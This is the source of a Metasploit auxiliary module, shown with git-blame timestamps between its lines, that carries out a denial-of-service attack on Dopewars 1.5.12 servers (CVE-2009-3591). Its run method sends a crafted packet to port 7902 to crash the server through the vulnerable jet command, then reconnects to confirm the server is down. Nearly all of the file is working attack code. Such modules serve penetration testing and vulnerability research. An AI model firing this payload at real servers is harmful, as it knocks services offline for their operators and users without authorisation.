metasploit-framework/modules/auxiliary/dos/misc/dopewars.rb

59 lines
1.6 KiB
Ruby
Raw Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2013-03-11 20:52:49 +00:00
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Dopewars Denial of Service',
'Description' => %q{
2017-08-25 01:38:44 +00:00
The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to
a lack of input validation.
2013-08-30 21:28:54 +00:00
},
'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2009-3591' ],
[ 'OSVDB', '58884' ],
2013-08-30 21:28:54 +00:00
[ 'BID', '36606' ]
],
'DisclosureDate' => "Oct 05 2009" ))
register_options([Opt::RPORT(7902)])
2013-08-30 21:28:54 +00:00
end
2013-03-11 20:52:49 +00:00
2013-08-30 21:28:54 +00:00
def run
# The jet command is vulnerable.
# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread 0xb74916c0 (LWP 30638)]
# 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at
# serverside.c:525
# 525 dopelog(4, LF_SERVER, "%s jets to %s",
#
connect
pkt = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"
print_status("Sending dos packet...")
sock.put(pkt)
disconnect
2013-03-11 20:52:49 +00:00
2013-08-30 21:28:54 +00:00
print_status("Checking for success...")
select(nil, nil, nil, 2)
begin
connect
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionRefused
print_good("Dopewars server successfully shut down!")
else
print_error("DOS attack unsuccessful")
ensure
disconnect
end
end
2013-03-11 20:52:49 +00:00
end